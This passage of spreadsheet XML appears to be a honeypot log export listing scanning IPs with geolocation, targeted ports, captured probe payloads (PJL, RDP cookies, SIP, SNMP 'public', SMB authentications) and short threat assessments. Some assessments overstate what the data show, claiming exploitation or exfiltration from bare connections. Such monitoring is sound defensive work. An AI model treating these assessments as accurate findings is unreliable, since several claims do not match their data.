B_FTP_H26&amp;&amp;SMA-LAB_SNMP_H13&amp;&amp;SMA-LAB_MT-CPA_H43&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_ORACLE_H20&amp;&amp;SMA-LAB_SNMP_H20&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_SOCKS5_H6&amp;&amp;SMA-LAB_FTP_H13</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;9100&amp;&amp;161&amp;&amp;80&amp;&amp;389&amp;&amp;54968&amp;&amp;1521&amp;&amp;143&amp;&amp;1433&amp;&amp;22&amp;&amp;55712&amp;&amp;6379&amp;&amp;3389&amp;&amp;5432&amp;&amp;NA&amp;&amp;23&amp;&amp;9100&amp;&amp;110&amp;&amp;1521&amp;&amp;6379&amp;&amp;57994&amp;&amp;9100&amp;&amp;21&amp;&amp;1521&amp;&amp;6379&amp;&amp;23549&amp;&amp;1080&amp;&amp;9100&amp;&amp;25&amp;&amp;5432&amp;&amp;445&amp;&amp;26231&amp;&amp;51228&amp;&amp;52336&amp;&amp;443&amp;&amp;50995&amp;&amp;55362&amp;&amp;52865&amp;&amp;5900&amp;&amp;3306&amp;&amp;55463&amp;&amp;54696&amp;&amp;63598&amp;&amp;55073&amp;&amp;51235&amp;&amp;51098&amp;&amp;55747&amp;&amp;57045&amp;&amp;54858</t>
  </si>
  <si>
    <t>connection&amp;&amp;query&amp;&amp;command&amp;&amp;NA&amp;&amp;stshash&amp;&amp;request&amp;&amp;GET</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=FaPEhwiiL'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=afluBe'}}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=lcHnFpgRB'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=VIAteG'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=iiozgR'}}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.82,61520)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.82,61522)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.82,59602)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.82,59604)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.82,59616)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=JFglCIKOw'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=HGAbLp'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=dwRJMY'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=nAYcKDzKr'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=mJNQDK'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=lccQEG'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=LMHVWEyfW'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ulpiJH'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=SMKeIy'}}</t>
  </si>
  <si>
    <t>::ffff:93b9:8452</t>
  </si>
  <si>
    <t>No login attempt was made via this service, as indicated by 'NA' for Data_TELNET. This might be an idle or unutilized connection. No malicious activity is evident from the log entry itself. &amp;&amp; The system has been accessed, possibly using SQL injection or exploitation of a vulnerability, as it is checking for MySQL access attempts. 
An attacker may be trying to gain unauthorized access to the database.
This could be an attempt to extract sensitive information. &amp;&amp; This log indicates a potential probing or reconnaissance activity, where an attacker is attempting to gather information about the available services on a target system. The specific command 'CAPABILITY' suggests that the attacker is trying to determine what features and options are supported by the service. This could be a precursor to further exploitation or malicious activity.</t>
  </si>
  <si>
    <t>SQL Scan &amp;&amp; Scanning Probe</t>
  </si>
  <si>
    <t>6348602b09a71b3de5da717235a8a1a3</t>
  </si>
  <si>
    <t>217.219.246.51</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MT-CPA_H30</t>
  </si>
  <si>
    <t>1433&amp;&amp;34229&amp;&amp;61632&amp;&amp;445&amp;&amp;61786&amp;&amp;61935&amp;&amp;61929&amp;&amp;61640&amp;&amp;62149</t>
  </si>
  <si>
    <t>Tehrān</t>
  </si>
  <si>
    <t>6659608</t>
  </si>
  <si>
    <t>35.7219</t>
  </si>
  <si>
    <t>51.3347</t>
  </si>
  <si>
    <t>58224</t>
  </si>
  <si>
    <t>Iran Telecommunication Company PJS</t>
  </si>
  <si>
    <t>Hakim Sabzevar University</t>
  </si>
  <si>
    <t>2001-04-03</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;NA&amp;&amp;{Data_SMB:Incoming connection (217.219.246.51,55059)}</t>
  </si>
  <si>
    <t>::ffff:d9db:f633</t>
  </si>
  <si>
    <t>An unknown device has connected to a shared resource from an IP address associated with malicious activity. This indicates potential unauthorized access or data exfiltration via this compromised connection. Further investigation is required to determine the full extent of the threat. &amp;&amp; Possible malicious activity detected: an incoming connection was made from a suspicious IP address to the SMB service. This could be indicative of unauthorized access or reconnaissance attempts by attackers. The source IP 217.219.246.51 is attempting to connect on port 55059.</t>
  </si>
  <si>
    <t>SMB Scanning &amp;&amp; SMB Scanning</t>
  </si>
  <si>
    <t>31447c1a5fd10ccc6f87fb6bf3f374a2</t>
  </si>
  <si>
    <t>117.209.98.29</t>
  </si>
  <si>
    <t>::ffff:75d1:621d</t>
  </si>
  <si>
    <t>b425c5f6616c5a5648f95188af220ba6</t>
  </si>
  <si>
    <t>162.83.233.137</t>
  </si>
  <si>
    <t>NA&amp;&amp;pool-162-83-233-137.nycmny.fios.verizon.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47</t>
  </si>
  <si>
    <t>NY</t>
  </si>
  <si>
    <t>New York</t>
  </si>
  <si>
    <t>Westchester</t>
  </si>
  <si>
    <t>Yonkers</t>
  </si>
  <si>
    <t>5145215</t>
  </si>
  <si>
    <t>10710</t>
  </si>
  <si>
    <t>40.9312</t>
  </si>
  <si>
    <t>-73.8988</t>
  </si>
  <si>
    <t>701</t>
  </si>
  <si>
    <t>Verizon Business</t>
  </si>
  <si>
    <t>Verizon Internet Services</t>
  </si>
  <si>
    <t>::ffff:a253:e989</t>
  </si>
  <si>
    <t>72d74e53bc149c0a01fea91e4eb0b579</t>
  </si>
  <si>
    <t>121.159.53.131</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H19</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;1433&amp;&amp;49274&amp;&amp;NA</t>
  </si>
  <si>
    <t>11</t>
  </si>
  <si>
    <t>Seoul</t>
  </si>
  <si>
    <t>Jung-gu</t>
  </si>
  <si>
    <t>1845068</t>
  </si>
  <si>
    <t>301131</t>
  </si>
  <si>
    <t>37.5601</t>
  </si>
  <si>
    <t>126.996</t>
  </si>
  <si>
    <t>::ffff:799f:3583</t>
  </si>
  <si>
    <t>Unknown activity detected on TELNET service, possibly due to lack of incoming connections. No malicious traffic reported so far, but potential vulnerabilities exist. Normal operation assumed for now.</t>
  </si>
  <si>
    <t>948d06421f52207cc271ead51ca8a3c0</t>
  </si>
  <si>
    <t>86.104.244.234</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_SMB_H40&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_SMB_H34&amp;&amp;SMA-LAB_SMB_H25</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;51692&amp;&amp;445&amp;&amp;1433&amp;&amp;NA&amp;&amp;3389</t>
  </si>
  <si>
    <t>02</t>
  </si>
  <si>
    <t>Māzandarān</t>
  </si>
  <si>
    <t>Bābolsar</t>
  </si>
  <si>
    <t>142358</t>
  </si>
  <si>
    <t>36.6993</t>
  </si>
  <si>
    <t>52.6501</t>
  </si>
  <si>
    <t>TCI(Mazandaran)</t>
  </si>
  <si>
    <t>Telecommunication Company of Mazandaran</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (86.104.244.234,56709)}&amp;&amp;{Data_SMB:Incoming connection (86.104.244.234,56928)}&amp;&amp;{Data_SMB:Incoming connection (86.104.244.234,56952)}&amp;&amp;{Data_SMB:Incoming connection (86.104.244.234,57055)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (86.104.244.234,55604)}&amp;&amp;{Data_SMB:Incoming connection (86.104.244.234,19771)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (86.104.244.234,46397)}&amp;&amp;{Data_SMB:Incoming connection (86.104.244.234,65092)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (86.104.244.234,43611)}&amp;&amp;{Data_SMB:Incoming connection (86.104.244.234,43559)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (86.104.244.234,64130)}&amp;&amp;{Data_SMB:Incoming connection (86.104.244.234,64180)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (86.104.244.234,28546)}&amp;&amp;{Data_SMB:Incoming connection (86.104.244.234,49459)}&amp;&amp;{Data_SMB:Incoming connection (86.104.244.234,49550)}&amp;&amp;{Data_SMB:Incoming connection (86.104.244.234,49656)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (86.104.244.234,56945)}&amp;&amp;{Data_SMB:Incoming connection (86.104.244.234,52198)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (86.104.244.234,54482)}&amp;&amp;{Data_SMB:Incoming connection (86.104.244.234,54548)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (86.104.244.234,63520)}&amp;&amp;{Data_SMB:Incoming connection (86.104.244.234,56671)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_RDP:NA}</t>
  </si>
  <si>
    <t>::ffff:5668:f4ea</t>
  </si>
  <si>
    <t>56c4498257dad6c585935dcaa93a2fd6</t>
  </si>
  <si>
    <t>117.200.190.199</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H43</t>
  </si>
  <si>
    <t>::ffff:75c8:bec7</t>
  </si>
  <si>
    <t>61019e792c2be9d1a5f340ec0748d1ad</t>
  </si>
  <si>
    <t>117.206.197.84</t>
  </si>
  <si>
    <t>::ffff:75ce:c554</t>
  </si>
  <si>
    <t>79e7acd7fd1b9607258e64031fdcecb5</t>
  </si>
  <si>
    <t>154.212.141.181</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;SIP Email Impersonation&amp;&amp;Email Spoofing</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_IMAP_H37&amp;&amp;SMA-LAB_HTTPS_H29&amp;&amp;SMA-LAB_SSH_H30&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_POP3_H34&amp;&amp;SMA-LAB_SIP_H12&amp;&amp;SMA-LAB_SMB_H26&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_POP3_H17&amp;&amp;SMA-LAB_POP3_H30&amp;&amp;SMA-LAB_POP3_H29&amp;&amp;SMA-LAB_POSTGRES_H33&amp;&amp;SMA-LAB_FTP_H35&amp;&amp;SMA-LAB_IMAP_H8&amp;&amp;SMA-LAB_IMAP_H11&amp;&amp;SMA-LAB_POSTGRES_H15&amp;&amp;SMA-LAB_FTP_H40&amp;&amp;SMA-LAB_POP3_H12&amp;&amp;SMA-LAB_RDP_H21&amp;&amp;SMA-LAB_PJL_H17&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_POP3_H23&amp;&amp;SMA-LAB_IMAP_H5&amp;&amp;SMA-LAB_POP3_H15&amp;&amp;SMA-LAB_POSTGRES_H7&amp;&amp;SMA-LAB_POSTGRES_H37&amp;&amp;SMA-LAB_SMTP_H45&amp;&amp;SMA-LAB_IMAP_H44&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_MYSQL_H36&amp;&amp;SMA-LAB_POP3_H40</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;143&amp;&amp;443&amp;&amp;22&amp;&amp;1433&amp;&amp;110&amp;&amp;NA&amp;&amp;445&amp;&amp;23&amp;&amp;5432&amp;&amp;21&amp;&amp;3389&amp;&amp;9100&amp;&amp;25&amp;&amp;8443&amp;&amp;3306&amp;&amp;80</t>
  </si>
  <si>
    <t>{'all.s5h.net': ['unknown']&amp;&amp; 'cbl.abuseat.org': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']}</t>
  </si>
  <si>
    <t>connection&amp;&amp;request&amp;&amp;command&amp;&amp;query&amp;&amp;GET&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.181;rport=35858'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '154.26.156.60:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 38.54.79.122:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '144.126.148.5:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.181;rport=46895'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '209.145.61.177:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.181,47662)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (eMzLmjAz,)}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 38.54.79.122:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.181;rport=34219'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'HELP', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'NTLM', 'command': 'AUTH', 'data': 'TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA='}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 94.131.118.77:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.181;rport=39813'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 94.131.8.76:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}</t>
  </si>
  <si>
    <t>::ffff:9ad4:8db5</t>
  </si>
  <si>
    <t>The attacker is scanning for services and testing credentials on various systems, indicating a reconnaissance phase of an attack. They are also attempting to exploit vulnerabilities by sending malicious requests to different ports. &amp;&amp; An anonymous user is attempting to login to an FTP service, which could be a reconnaissance or malicious activity. The user has initiated the initial step of establishing a connection without providing any credentials beyond "anonymous". This action may indicate an attempt to gain unauthorized access to sensitive files. &amp;&amp; This log indicates an attempt to connect to an FTP service using anonymous credentials, which could be a reconnaissance or initial step in a larger malicious attack. The attacker is likely attempting to establish a connection without proper authentication, potentially for further exploitation or data transfer. This activity may precede a brute-force login attempt or data exfiltration. &amp;&amp; A GET request is made to a server on port 9100 from an IP address, which could be a scan or reconnaissance attempt. 
The requested URL and port number are unusual, suggesting potential malicious intent.
This activity may indicate a probing operation. &amp;&amp; A GET request is being sent to a web server, possibly an attempt to scan or exploit the system with a specific host and port targeted. This could be reconnaissance or the first step in a larger attack. The target IP seems to be a non-standard web server configuration.</t>
  </si>
  <si>
    <t>Password cracking or Brute force &amp;&amp; Brute FTP &amp;&amp; Anonymous login &amp;&amp; Scan Attack &amp;&amp; Scanning Attack</t>
  </si>
  <si>
    <t>8777a1353b03d6d7cedb3b559d39af6d</t>
  </si>
  <si>
    <t>122.160.167.250</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H43</t>
  </si>
  <si>
    <t>New Delhi (Okhla Phase III)</t>
  </si>
  <si>
    <t>110049</t>
  </si>
  <si>
    <t>28.5491</t>
  </si>
  <si>
    <t>77.2687</t>
  </si>
  <si>
    <t>24560</t>
  </si>
  <si>
    <t>Bharti Airtel Limited</t>
  </si>
  <si>
    <t>BHARTI</t>
  </si>
  <si>
    <t>Abts Delhi</t>
  </si>
  <si>
    <t>2006-12-19</t>
  </si>
  <si>
    <t>ABTS-DSl-DEL</t>
  </si>
  <si>
    <t>::ffff:7aa0:a7fa</t>
  </si>
  <si>
    <t>b6b220bf9fb81be5f7245dd18d1076b0</t>
  </si>
  <si>
    <t>122.166.22.83</t>
  </si>
  <si>
    <t>Bengaluru (Industrial Layout)</t>
  </si>
  <si>
    <t>12.8884</t>
  </si>
  <si>
    <t>77.6387</t>
  </si>
  <si>
    <t>ABTS (Karnataka)</t>
  </si>
  <si>
    <t>ABTS-KK-DSL-9102-blr</t>
  </si>
  <si>
    <t>::ffff:7aa6:1653</t>
  </si>
  <si>
    <t>5c8cb5902ddb23eace1f61a9803d9f4c</t>
  </si>
  <si>
    <t>180.145.119.148</t>
  </si>
  <si>
    <t>180-145-119-148f1.osk2.eonet.ne.jp</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:ssh']</t>
  </si>
  <si>
    <t>JP</t>
  </si>
  <si>
    <t>Japan</t>
  </si>
  <si>
    <t>27</t>
  </si>
  <si>
    <t>Osaka</t>
  </si>
  <si>
    <t>Sakai</t>
  </si>
  <si>
    <t>1853195</t>
  </si>
  <si>
    <t>34.5822</t>
  </si>
  <si>
    <t>135.467</t>
  </si>
  <si>
    <t>17511</t>
  </si>
  <si>
    <t>OPTAGE Inc.</t>
  </si>
  <si>
    <t>K-Opticom Corporation</t>
  </si>
  <si>
    <t>['ns1.eonet.ne.jp', 'ns7.eonet.ne.jp']</t>
  </si>
  <si>
    <t>Connected (2025/08/31)</t>
  </si>
  <si>
    <t>::ffff:b491:7794</t>
  </si>
  <si>
    <t>a46e4568761451af65354d1344233a46</t>
  </si>
  <si>
    <t>103.158.22.123</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MSSQL_H46</t>
  </si>
  <si>
    <t>BT</t>
  </si>
  <si>
    <t>Banten</t>
  </si>
  <si>
    <t>South Tangerang</t>
  </si>
  <si>
    <t>8581443</t>
  </si>
  <si>
    <t>-6.24439</t>
  </si>
  <si>
    <t>106.777</t>
  </si>
  <si>
    <t>141590</t>
  </si>
  <si>
    <t>PT Tujuh Media Angkasa</t>
  </si>
  <si>
    <t>PT. Tujuh Media Angkasa</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.158.22.123,54398)}&amp;&amp;{Data_SMB:Incoming connection (103.158.22.123,54410)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.158.22.123,54026)}&amp;&amp;{Data_SMB:Incoming connection (103.158.22.123,54030)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.158.22.123,54384)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.158.22.123,5522)}&amp;&amp;{Data_SMB:Incoming connection (103.158.22.123,5530)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.158.22.123,5893)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.158.22.123,49583)}&amp;&amp;{Data_SMB:Incoming connection (103.158.22.123,50329)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.158.22.123,62683)}&amp;&amp;{Data_SMB:Incoming connection (103.158.22.123,59721)}&amp;&amp;{Data_SMB:Incoming connection (103.158.22.123,60412)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.158.22.123,49666)}&amp;&amp;{Data_SMB:Incoming connection (103.158.22.123,49689)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.158.22.123,50082)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.158.22.123,50466)}&amp;&amp;{Data_SMB:Incoming connection (103.158.22.123,50995)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.158.22.123,64848)}&amp;&amp;{Data_SMB:Incoming connection (103.158.22.123,65331)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.158.22.123,51193)}&amp;&amp;{Data_SMB:Incoming connection (103.158.22.123,51208)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.158.22.123,51644)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.158.22.123,28143)}</t>
  </si>
  <si>
    <t>::ffff:679e:167b</t>
  </si>
  <si>
    <t>An unknown device at IP address 103.158.22.123 attempted to connect to a shared resource on port 28143.
This could be a scanning or probing attempt for vulnerabilities in the system.
It may also be an attempt to exploit the system for unauthorized access. &amp;&amp; Malicious activity detected: A remote system attempted to establish a connection to an SMB service on our server from IP address 103.158.22.123 on port 28143. This could be an attempt to access or exploit the SMB service for unauthorized purposes.</t>
  </si>
  <si>
    <t>SMB Attack &amp;&amp; SMB Scan</t>
  </si>
  <si>
    <t>7f0675aebec2fcf2f895ef60cb0974e6</t>
  </si>
  <si>
    <t>116.103.46.79</t>
  </si>
  <si>
    <t>SMA-LAB_POSTGRES_HC1</t>
  </si>
  <si>
    <t>5432</t>
  </si>
  <si>
    <t>26</t>
  </si>
  <si>
    <t>Thừa Thiên Huế Province</t>
  </si>
  <si>
    <t>Phú Lộc District</t>
  </si>
  <si>
    <t>Phú Lộc</t>
  </si>
  <si>
    <t>1570496</t>
  </si>
  <si>
    <t>16.2803</t>
  </si>
  <si>
    <t>107.859</t>
  </si>
  <si>
    <t>24086</t>
  </si>
  <si>
    <t>2007-05-18</t>
  </si>
  <si>
    <t>{Data_POSTGRES:NA}</t>
  </si>
  <si>
    <t>::ffff:7467:2e4f</t>
  </si>
  <si>
    <t>79ccd2bcb1efcaf2a0891a1ee544f6dc</t>
  </si>
  <si>
    <t>205.210.31.38</t>
  </si>
  <si>
